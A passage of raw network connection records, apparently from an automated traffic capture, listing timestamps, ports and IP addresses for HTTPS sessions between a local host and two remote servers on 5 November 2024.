Nov 5, 2024 15:56:52.660145998 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.667769909 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.667819023 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.667823076 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.667869091 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.671684980 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.671730042 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.674385071 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.674434900 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.680701971 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.680761099 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.680852890 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.680900097 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.680916071 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.680959940 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.776987076 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.777046919 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.777059078 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.777096987 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.777100086 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.777146101 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.777149916 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.777194977 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.784101009 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.784147024 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.784152031 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.784197092 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.791465044 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.791517019 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.791521072 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.791568995 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.797627926 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.797672987 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.797677040 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.797718048 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.797769070 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.797816992 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.894076109 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.894161940 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.894175053 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.894215107 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.901165962 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.901222944 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.901252031 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.901258945 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.901269913 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.901319981 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.901343107 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.901382923 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.901398897 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.901451111 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.901454926 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.901495934 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.908848047 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.908909082 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.908912897 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.908961058 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.914747953 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.914825916 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.914830923 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.914885998 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.955789089 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.955879927 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:52.955884933 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:52.955930948 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.011063099 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.011145115 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.011156082 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.011202097 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.018146992 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.018197060 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.018210888 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.018251896 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.018285990 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.018340111 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.025413036 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.025469065 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.025474072 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.025511026 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.034929991 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.034993887 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.034996986 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.035048962 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.072752953 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.072810888 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.072820902 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.072865009 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.128005028 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.128072977 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.128079891 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.128123045 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.128127098 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.128176928 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.135221004 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.135267973 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.135333061 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.135390997 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.135395050 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.135442019 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.135446072 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.135498047 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.142515898 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.142570019 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.142574072 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.142616034 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.142648935 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.142703056 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.142709970 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.142755985 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.148727894 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.148781061 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.190979004 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.191034079 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.191044092 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.191082001 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.245167017 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.245260954 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.245270967 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.245325089 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.252538919 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.252610922 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.252621889 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.252629995 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.252657890 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.252706051 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.252710104 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.252759933 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.259628057 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.259682894 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.259707928 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.259712934 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.259737015 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.259778976 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.259782076 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.259824991 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.306947947 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.307033062 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.307044983 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.307097912 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.362134933 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.362191916 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.362198114 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.362251043 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.370243073 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.370297909 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.370325089 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.370331049 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.370356083 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.370383978 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.370408058 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.370449066 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.370461941 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.370501041 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.370677948 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.370714903 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.370721102 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.370764017 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.376529932 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.376602888 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.376653910 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.376699924 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.376703024 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.376744032 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.376748085 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.376791954 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.423973083 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.424019098 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.424045086 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.424084902 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.479327917 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.479409933 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.479420900 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.479468107 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.487606049 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.487664938 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.487703085 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.487746000 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.487801075 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.487807035 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.487842083 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.487863064 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.488089085 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.488137960 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.496520996 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.496573925 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.496577978 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.496623039 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.496625900 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.496671915 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.496675968 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.496722937 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.496726990 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.496776104 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.541141987 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.541213989 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.541222095 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.541271925 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.596554995 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.596636057 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.596648932 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.596694946 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.604657888 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.604717016 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.604727983 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.604772091 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.604775906 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.604819059 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.604823112 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.604870081 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.604916096 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.604964972 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.605093956 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.605144024 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.613624096 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.613682032 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.613692999 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.613734007 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.613738060 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.613784075 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.613786936 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.613831997 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.658081055 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.658267975 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.658278942 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.658329964 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.715814114 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.715895891 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.715909004 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.715966940 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.722918987 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.722979069 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.722982883 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.723037004 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.723041058 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.723089933 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.723217964 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.723267078 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.723270893 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.723320007 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.723341942 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.723387003 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.723390102 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.723437071 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.723439932 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.723481894 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.723484993 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.723551035 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.730729103 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.730804920 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.730808973 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.730850935 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.730858088 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.730906963 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.730911016 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.730958939 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.775346994 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.775403023 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.775439978 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.775492907 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.832772970 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.832962036 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.832973957 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.833020926 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.840543032 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.840614080 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.840624094 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.840667963 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.840672016 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.840714931 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.840718985 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.840768099 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.840771914 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.840823889 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.840907097 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.840951920 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.840967894 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.841016054 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.841020107 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.841068029 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.841070890 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.841118097 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.848848104 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.848890066 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.848917007 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.848958015 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.848961115 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.849010944 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.849014044 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.849062920 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.892524004 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.892610073 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.892628908 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.892687082 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.949700117 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.949779987 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.949810982 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.949856043 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.957287073 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.957353115 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.957375050 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.957426071 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.957447052 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.957484007 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.957520962 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.957557917 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.957576990 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.957614899 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.957631111 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.957669973 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.957693100 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.957731009 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.958312988 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.958359003 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.958369017 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.958409071 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.964857101 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.964922905 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.964937925 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.964982033 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.965780973 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.965825081 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.965913057 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.965951920 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.965997934 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.966033936 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.966047049 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.966085911 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.966118097 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:53.966161013 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.966517925 CET	49876	443	192.168.2.7	142.250.186.161
Nov 5, 2024 15:56:53.966533899 CET	443	49876	142.250.186.161	192.168.2.7
Nov 5, 2024 15:56:54.178026915 CET	49903	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:56:54.178072929 CET	443	49903	172.67.74.152	192.168.2.7
Nov 5, 2024 15:56:54.178149939 CET	49903	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:56:54.179538012 CET	49903	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:56:54.179548979 CET	443	49903	172.67.74.152	192.168.2.7
Nov 5, 2024 15:56:54.782170057 CET	443	49903	172.67.74.152	192.168.2.7
Nov 5, 2024 15:56:54.782248020 CET	49903	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:56:54.784183025 CET	49903	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:56:54.784188986 CET	443	49903	172.67.74.152	192.168.2.7
